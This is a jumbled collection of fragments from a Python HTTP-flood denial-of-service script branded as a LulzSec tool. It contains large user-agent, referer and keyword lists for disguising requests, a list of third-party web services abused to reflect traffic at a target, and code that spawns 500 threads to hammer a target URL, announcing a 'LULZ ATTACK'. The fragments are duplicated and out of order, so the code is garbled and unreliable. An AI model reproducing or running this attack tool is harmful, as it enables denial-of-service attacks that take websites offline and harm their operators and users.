headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x Build xxxxx') headers_useragents.append('Adaxas Spider", "Gecko/20100101 Firefox/26.0 IceDragon/26.0.0.2') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2;", "native)') headers_useragents.append('AmiTCP Miami (AmigaOS 2.04)') headers_useragents.append('Amoi 8512/R21.0 NF-Browser/3.3') headers_useragents.append('amzn_assoc') headers_useragents.append('AnnoMille spider 0.1 alpha", "da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url = sys.argv[1] if", "headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr;", "keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex') keyword_top.append('<NAME>') keyword_top.append('World", "Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30", "PROve x.0') headers_useragents.append('AnswerChase x.0') headers_useragents.append('ANTFresco/x.xx') headers_useragents.append('antibot-V1.1.5/i586-linux-2.2') headers_useragents.append('AnzwersCrawl/2.0 (<EMAIL>;Engine)') headers_useragents.append('Apexoo Spider 1.x') headers_useragents.append('Aplix HTTP/1.0.1')", "Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0 (Linux; U;", "at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace Explorer') headers_useragents.append('Ack", "'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\" . _____|\\", "headers_useragents.append('Minimo/0.020') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI)", "(Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible;", "Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket", "headers_useragents.append('aipbot/1.0 (aipbot; http://www.aipbot.com; <EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; <EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0", "http://www.aipbot.com; a<EMAIL>)') headers_useragents.append('aipbot/2-beta (aipbot dev; http://aipbot.com; a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika", "Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "Chrome/37.0.2049.0 Safari/537.36') # generates a referer array def referer_list(): global headers_referers headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=')", "def useragent_list(): global headers_useragents headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML,", "~~ _// _// _// ~ _// ~ ~ / / / / /", "params url='' host='' headers_useragents=[] headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1", "Safari/533.1') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.3; ru-ru; Explay Surfer 7.02 Build/ICS.g12refM703A1HZ1.20121009) AppleWebKit/534.30 (KHTML,", "headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0; PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA;", "/ / / / / / / ~ ~~ ~~~ ~~~ ~~~ ~~~", "en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)') headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2;", "and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search Engine; acorn.isara.org; acorn at isara dot org)') headers_useragents.append('ActiveBookmark", "v2.0') headers_useragents.append('8484 Boston Project v 1.0') headers_useragents.append(':robot/1.0 (linux) ( admin e-mail: undefined http://www.neofonie.de/loesungen/search/robot.html", "http://www.simpy.com/bot.html; feedback at simpy dot com)') headers_useragents.append('Arikus_Spider') headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search", "headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9", "(KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36", ": :: ,. . ,' :: /`-._| | | || ' : `.`.)", "http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by www.123spider.de') headers_useragents.append('192.comAgent') headers_useragents.append('1st ZipCommander (Net) - http://www.zipcommander.com/')", "headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla", "Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)')", "keyword_top.append('anderson east') keyword_top.append('kroger') ('http://' + host + '/') return(headers_referers) def bots(): global bots", "(KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') headers_useragents.append('Mozilla/5.0 (Android; Tablet; rv:18.0) Gecko/18.0 Firefox/18.0') headers_useragents.append('Mozilla/5.0", "(PDA; Windows CE/1.0.1) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; SL-C750/1.0,Embedix/Qtopia/1.3.0) NetFront/3.0 Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E", "headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=') headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=')", "Search') headers_useragents.append('A1 Keyword Research/1.0.2 (+http://www.micro-sys.dk/products/keyword-research/) miggibot/2007.03.27') headers_useragents.append('A1 Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT", "V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\ \"\"\"", "bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\")", "headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4", "BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4')", "4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7 Build/JRO03D)')", "Zaurus C750') headers_useragents.append('WM5 PIE') headers_useragents.append('Xiino/1.0.9E [en] (v. 4.1; 153x130; g4)') headers_useragents.append('Mozilla/5.0 (Linux; U;", "Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by Newsbrain)') headers_useragents.append('AlkalineBOT/1.3') headers_useragents.append('AlkalineBOT/1.4 (1.4.0326.0 RTM)') headers_useragents.append('Allesklar/0.1 libwww-perl/5.46')", "Windows CE 5.1; rv:1.8.1a3) Gecko/20060610') headers_useragents.append('Minimo/0.016') headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36') headers_useragents.append('Mozilla/5.0", "\\ // `:`. ,' \\ /-._; | : : :: ,. . ,'", "Up\" % (request_counter) previous=request_counter if flag==2: print \"\\n -lULZ Finish\" #execute if len(sys.argv)", "headers_referers.append('http://www.zhongsou.com/third?w=') headers_referers.append('http://hksearch.timway.com/search.php?query=') headers_referers.append('http://find.ezilon.com/search.php?q=') headers_referers.append('http://www.sogou.com/web?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')", "headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST Crawler 6.4; http://www.araby.com;)') headers_useragents.append('ArachBot') headers_useragents.append('Arachnoidea (<EMAIL>)') headers_useragents.append('aranhabot')", "headers_useragents.append('Alligator 1.31 (www.nearsoftware.com)') headers_useragents.append('Allrati/1.1 (+)') headers_useragents.append('AltaVista Intranet V2.0 AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet", "Challenge') keyword_top.append('Flappy Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung", "url.count(\"/\")==2: url = url + \"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1)", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=')", "Viewer/1.0) NetFront/3.2') headers_useragents.append('Mozilla/4.0 (PS2; PlayStation BB Navigator 1.0) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model crdb/Revision:1.1.36(de))", "en-us;') headers_useragents.append('VS840 4G Build/GRK39F)') headers_useragents.append('AppleWebKit/533.1 (KHTML, like Gecko)') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/5.0 (Windows", "headers_referers=[] request_counter=0 flag=0 safe=0 def inc_counter(): global request_counter request_counter+=1 def set_flag(val): global flag", "Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 2.2; fr-fr; Desire_A8181 Build/FRF91)') headers_useragents.append('App3leWebKit/53.1 (KHTML, like Gecko)", "(Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Macintosh; Intel Mac", "keyword_top.append('Apple Watch') keyword_top.append('Nokia X') keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('Ecosistema') keyword_top.append('Suicide') keyword_top.append('Sex')", "Nexus 4 Build/JOP40D) AppleWebKit/535.19 (KHTML, like Gecko)') headers_useragents.append('Mozilla/5.0 (Linux; Android 4.1.1; Nexus 7", "#print e.reason sys.exit() else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def", "(PDA; PalmOS/sony/model crdb/Revision:1.1.36(de)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; PalmOS/sony/model prmr/Revision:1.1.54 (en)) NetFront/3.0') headers_useragents.append('Mozilla/4.0 (PDA; Windows", "WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36", "ru) Presto/2.5.22 Version/10.51') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1", "(http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot - Crawling", "keyword_top.append('World Cup') keyword_top.append('Ca Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice", "O_. ; ; : `. // // // // ,' / ~~~`.______//____//____//____//_______,'~ //", "headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://api.duckduckgo.com/html/?q=') headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=') headers_referers.append('http://yandex.ru/yandsearch?text=')", "Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson')", "a<EMAIL>)') headers_useragents.append('Akregator/1.2.9; librss/remnants') headers_useragents.append('Aladin/3.324') headers_useragents.append('Alcatel-BG3/1.0 UP.Browser/5.0.3.1.2') headers_useragents.append('Aleksika Spider/1.0 (+http://www.aleksika.com/)') headers_useragents.append('AlertInfo 2.0 (Powered by", ": : :: ,. . ,' :: /`-._| | | || ' :", "Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit", "PalmOS) PLink 2.56b') headers_useragents.append('Mozilla/5.0 (PDA; NF35WMPRO/1.0; like Gecko) NetFront/3.5') headers_useragents.append('Mozilla/4.08 (Windows; Mobile Content", "heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x ; libtime.pl/x.x)')", "(v40) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('Cocoal.icio.us/1.0 (v38) (Mac OS X; http://www.scifihifi.com/cocoalicious)') headers_useragents.append('DomainsDB.net MetaCrawler", "headers_useragents.append('atSpider/1.0') headers_useragents.append('Attentio/Nutch-0.9-dev (Attentios beta blog crawler; www.attentio.com; <EMAIL>)') headers_useragents.append('AU-MIC/2.0 MMP/2.0') headers_useragents.append('AUDIOVOX-SMT5600') headers_useragents.append('augurfind') headers_useragents.append('augurnfind", "Chrome/41.0.2226.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36')", "bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\") bots.append(\"http://validator.w3.org/check?uri=\") bots.append(\"http://www.facebook.com/sharer/sharer.php?u=\") bots.append(\"http://downforeveryoneorjustme.com/\") bots.append(\"http://network-tools.com/default.asp?prog=ping&host=\") bots.append(\"http://network-tools.com/default.asp?prog=trace&host=\") bots.append(\"http://network-tools.com/default.asp?prog=network&host=\")", "dot org)') headers_useragents.append('ActiveBookmark 1.x') headers_useragents.append('Activeworlds') headers_useragents.append('ActiveWorlds/3.xx (xxx)') headers_useragents.append('Ad Muncher v4.xx.x') headers_useragents.append('Ad Muncher v4x", "headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) BlackHawk/1.0.195.0 Chrome/127.0.0.1", "Version/5.0 Safari/533.16') headers_useragents.append('Version/4.0 Mobile Safari/533.1') headers_useragents.append('Mozilla/1.22 (compatible; MSIE 5.01;') headers_useragents.append('PalmOS 3.0) EudoraWeb 2.1')", "Priv8 Privada da LulzSec Ghost\" if len(sys.argv)== 3: if sys.argv[2]==\"safe\": set_safe() url =", "Browser (http://www.avantbrowser.com)') headers_useragents.append('AVSearch-1.0(<EMAIL>)') headers_useragents.append('AVSearch-2.0-fusionIdx-14-CompetitorWebSites') headers_useragents.append('AVSearch-3.0(AltaVista/AVC)') headers_useragents.append('AWeb') headers_useragents.append('axadine/ (Axadine Crawler; http://www.axada.de/; )') headers_useragents.append('AxmoRobot -", "<EMAIL>') headers_useragents.append('amaya/x.xx libwww/x.x.x') headers_useragents.append('AmfibiBOT') headers_useragents.append('Amfibibot/0.06 (Amfibi Web Search; http://www.amfibi.com; <EMAIL>)') headers_useragents.append('Amfibibot/0.07 (Amfibi Robot;", "Bird') keyword_top.append('Conchita Wurst') keyword_top.append('ISIS') keyword_top.append('Frozen') keyword_top.append('014 Sochi Winter Olympics') keyword_top.append('IPhone') keyword_top.append('Samsung Galaxy S5')", "Linux; Opera') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 3.0.1; en-us; A500 Build/HRI66)') headers_useragents.append('Mozilla/5.0 (X11; Linux", "Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows", "OS X 10.4.11)') headers_useragents.append('Mozilla/5.0 (Danger hiptop 3.4; U; AvantGo 3.2)') headers_useragents.append('Mozilla/3.0 (compatible; AvantGo", "`:`. ,' \\ /-._; | : : :: ,. . ,' :: /`-._|", "1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102') headers_useragents.append('Apple-PubSub/65.1.1') headers_useragents.append('ArabyBot (compatible; Mozilla/5.0; GoogleBot; FAST", "Checkomat Aberja Hybridsuchmaschine (Germany)') headers_useragents.append('abot/0.1 (abot; http://www.abot.com; <EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona", "Chrome/37.0.2062.124 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0", "By V3I0p3r' print 'Script Priv8 Privada da LulzSec Ghost' print \"\\a\" print \\", "on www.axmo.com search engine.') headers_useragents.append('Azureus 2.x.x.x') headers_useragents.append('BabalooSpider/1.3 (BabalooSpider; http://www.babaloo.si; <EMAIL>)') headers_useragents.append('BaboomBot/1.x.x (+http://www.baboom.us)') headers_useragents.append('BackStreet", "(Linux; Android 4.1.1;') headers_useragents.append('Mozilla/5.0 (Linux; U; Android 4.0.4; en-us;') headers_useragents.append('Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux;", "keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs') keyword_top.append('uber') keyword_top.append('american eagle') keyword_top.append('jessica simpson') keyword_top.append('jacket')", "v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot 4.0.x.[xx] (http://www.acoon.de)') headers_useragents.append('Acoon-Robot v3.xx (http://www.acoon.de and http://www.acoon.com)') headers_useragents.append('Acorn/Nutch-0.9 (Non-Profit Search", "AVS EVAL <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0 Compaq Altavista Eval <EMAIL>') headers_useragents.append('AltaVista Intranet V2.0", "<EMAIL>)') headers_useragents.append('About/0.1libwww-perl/5.47') headers_useragents.append('Accelatech RSSCrawler/0.4') headers_useragents.append('accoona Accoona Search robot') headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot", "headers_useragents.append('OPWV-SDK UP.Browser/7.0.2.3.119 (GUI) MMP/2.0 Push/PO') headers_useragents.append('UP.Browser/6.1.0.1.140 (Google CHTML Proxy/1.0)') headers_useragents.append('Mozilla/4.0 (compatible; MSIE 5.0;", "keyword_top.append('Ipad Air') keyword_top.append('Facebook') keyword_top.append('Anonymous') keyword_top.append('DJ Bach') keyword_top.append('adidas') keyword_top.append('ask.fm') keyword_top.append('adele') keyword_top.append('5x nexus') keyword_top.append('espn') keyword_top.append('uggs')", "\"/\" m = re.search('http\\://([^/]*)/?.*', url) host = m.group(1) for i in range(500): t", "headers_useragents.append('Arquivo-web-crawler (compatible; heritrix/1.12.1 +http://arquivo-web.fccn.pt)') headers_useragents.append('ASAHA Search Engine Turkey V.001 (http://www.asaha.com/)') headers_useragents.append('Asahina-Antenna/1.x') headers_useragents.append('Asahina-Antenna/1.x (libhina.pl/x.x", "headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.google.com/?q=') headers_referers.append('http://www.usatoday.com/search/results?q=') headers_referers.append('http://engadget.search.aol.com/search?q=') headers_referers.append('http://www.bing.com/search?q=') headers_referers.append('http://search.yahoo.com/search?p=') headers_referers.append('http://www.ask.com/web?q=') headers_referers.append('http://search.lycos.com/web/?q=') headers_referers.append('http://busca.uol.com.br/web/?q=') headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=') headers_referers.append('http://www.dmoz.org/search/search?q=') headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')", "Sitemap Generator/1.0 (+http://www.micro-sys.dk/products/sitemap-generator/) miggibot/2006.01.24') headers_useragents.append('AbachoBOT') headers_useragents.append('AbachoBOT (Mozilla compatible)') headers_useragents.append('ABCdatos BotLink/5.xx.xxx#BBL') headers_useragents.append('Aberja Checkomat Aberja", "#print e.code set_flag(1) print '[+]~>LULZ ATTACK STARTRD<~' print '[+]~~>LULZ ATTACK STARTRD<~~[+] ' code=500", "headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('Apple iPhone v1.1.4 CoreMedia v1.0.0.4A102')", "monitors http threads and counts requests class MonitorThread(threading.Thread): def run(self): previous=request_counter while flag==0:", "headers_useragents.append('Ace Explorer') headers_useragents.append('Ack (http://www.ackerm.com/)') headers_useragents.append('AcoiRobot') headers_useragents.append('Acoon Robot v1.50.001') headers_useragents.append('Acoon Robot v1.52 (http://www.acoon.de)') headers_useragents.append('Acoon-Robot", "~~~ ~~~ ~~~ ~~~ \"\"\" #http request def httpcall(url): useragent_list() referer_list() code=0 if", "Si Le Roi') keyword_top.append('Ebola') keyword_top.append('Malaysia Airlines Flight 370') keyword_top.append('ALS Ice Bucket Challenge') keyword_top.append('Flappy", "U; Android 4.1.2; en-gb; GT-I9300 Build/JZO54K)') headers_useragents.append('AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30')", "headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1 http://www.die-kraehe.de') headers_useragents.append('123spider-Bot (Version: 1.02) powered by", "Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36') headers_useragents.append('Mozilla/5.0 (Windows NT 4.0; WOW64)", "._O O_. ; ; : `. // // // // ,' / ~~~`.______//____//____//____//_______,'~", "headers_useragents.append('Accoona-AI-Agent/1.1.1 (crawler at accoona dot com)') headers_useragents.append('Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)') headers_useragents.append('Ace", "global request_counter request_counter+=1 def set_flag(val): global flag flag=val def set_safe(): global safe safe=1", "X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36') headers_useragents.append('Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36", "4.0.3; fr-fr; MIDC41') headers_useragents.append('Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30') headers_useragents.append('Mozilla/5.0 (Linux; U;", "headers_useragents.append('BanBots/1.2 (<EMAIL>)') headers_useragents.append('Barca/2.0.xxxx') headers_useragents.append('(DreamPassport/3.0; isao/MyDiGiRabi)') headers_useragents.append('(Privoxy/1.0)') headers_useragents.append('*/Nutch-0.9-dev') headers_useragents.append('+SitiDi.net/SitiDiBot/1.0 (+Have Good Day)') headers_useragents.append('-DIE-KRAEHE- META-SEARCH-ENGINE/1.1", "buildblock(size): out_str = '' for i in range(0, size): a = random.randint(65, 90)", "HTTP/1.0.1') headers_useragents.append('Aplix_SANYO_browser/1.x (Japanese)') headers_useragents.append('Aplix_SEGASATURN_browser/1.x (Japanese)') headers_useragents.append('Aport') headers_useragents.append('appie 1.1 (www.walhello.com)') headers_useragents.append('agadine/1.x.x (+http://www.agada.de)') headers_useragents.append('Agent-SharewarePlazaFileCheckBot/2.0+(+http://www.SharewarePlaza.com)') headers_useragents.append('AgentName/0.1", "else: inc_counter() urllib2.urlopen(request) return(code) #http caller thread class HTTPThread(threading.Thread): def run(self): try: while", ": \\ `--. ) /|-._: : | \\ \\ / / :_| ;`-._;", "global headers_referers 